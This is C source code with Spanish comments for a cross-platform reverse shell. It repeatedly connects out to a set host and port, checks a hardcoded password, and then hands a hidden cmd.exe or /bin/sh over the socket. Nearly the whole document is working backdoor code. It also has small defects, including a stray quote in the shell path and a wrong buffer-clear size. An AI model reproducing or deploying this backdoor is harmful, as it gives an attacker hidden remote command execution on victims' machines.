Código
#include <stdio.h> #include <string.h> //cabecera y librerias segun SO #ifdef WIN32 #include <winsock2.h> #pragma comment(lib,"ws2_32.lib") #else #include <netdb.h> #include <sys/socket.h> #define SOCKET_ERROR -1 #endif #define PASSWORD "mi_pass\0" //contraseña char Buffer[1024]; //variable para enviar/recibir datos int Recv; //para saber cuantos datos hemos transmitido int sock; int ReverseShell(char *Destino, short Puerto,char *pwd); /*funcion principal*/ int main() { for(;;) { if(send(sock,"",0,0)<=0) { #ifdef WIN32 WSACleanup(); #else close(sock); #endif ReverseShell("localhost",4664,PASSWORD); } #ifdef WIN32 Sleep(100); #else sleep(100); #endif } return 0; } int ReverseShell(char *Destino, short Puerto, char *pwd) { int Loggea(); struct hostent *Master; struct sockaddr_in Winsock_In; //si estamos en windows cargamos la libreria #ifdef WIN32 STARTUPINFO start_proc; PROCESS_INFORMATION info_proc; OSVERSIONINFO SOinfo; WSADATA wsaData; char *shell; //iniciamos la libreria para crear socket WSAStartup(MAKEWORD(2,2),/*version del socket*/ &wsaData /*estrutura que recibe las propiedades del socket*/); if((sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL))==INVALID_SOCKET) return 0; #else if((sock=socket(AF_INET,SOCK_STREAM,0))==SOCKET_ERROR) return 0; #endif Master=gethostbyname(Destino); Winsock_In.sin_family=AF_INET; //IPv4 Winsock_In.sin_port=htons(Puerto); //puerto al que conectar Winsock_In.sin_addr= *((struct in_addr *) Master->h_addr); //host al que conectar #ifdef WIN32 if(WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) return 0; #else if(connect(sock,(struct sock_addr *)&Winsock_In,sizeof(struct sockaddr))==SOCKET_ERROR) return 0; #endif if(Loggea()==0) return 0; #ifdef WIN32 //rellenamos la estructura memset(&start_proc,0,sizeof(start_proc));//limpiamos start_proc.cb=sizeof(start_proc); start_proc.dwFlags=STARTF_USESTDHANDLES; start_proc.wShowWindow=SW_HIDE; start_proc.hStdInput=(HANDLE)sock; start_proc.hStdOutput=(HANDLE)sock; start_proc.hStdError=(HANDLE)sock; GetVersionEx(&SOinfo); if(SOinfo.dwPlatformId==VER_PLATFORM_WIN32_WINDOWS) { shell="command.com\0"; } else { shell="cmd.exe\0"; } //lanzamos la shell if(CreateProcess(NULL,shell,NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0) { return 1; } else { WSACleanup(); return 0; } #else if(fork()!=0) { close(sock); return 0; } //duplicamos los handles del socket dup2(sock,0); dup2(sock,1); dup2(sock,2); if(!execl("/bin/sh'","sh",NULL)) { close(sock); return 0; } #endif return 1; } //devulve 0 (incorrecto) / 1 (correcto) int Loggea() { if(PASSWORD!=NULL) { do { //limpiamos el buffer memset(Buffer,0,sizeof(char*)); //pedimos la contraseña send(sock,"\n[#] Introduce la password: ",strlen("\n[#]Introduce la password: "),0); //recibimos los datos Recv=recv(sock,Buffer,1024,0); //comprobamos si ha cerrado la conexion if(Recv<=0) return 0; Buffer[Recv-1]='\0'; } while(strcmp(Buffer,PASSWORD)!=0); send(sock,"[#]Aceptada!\n\n",strlen("[#]Aceptada!\n\n)"),0); } return 1; }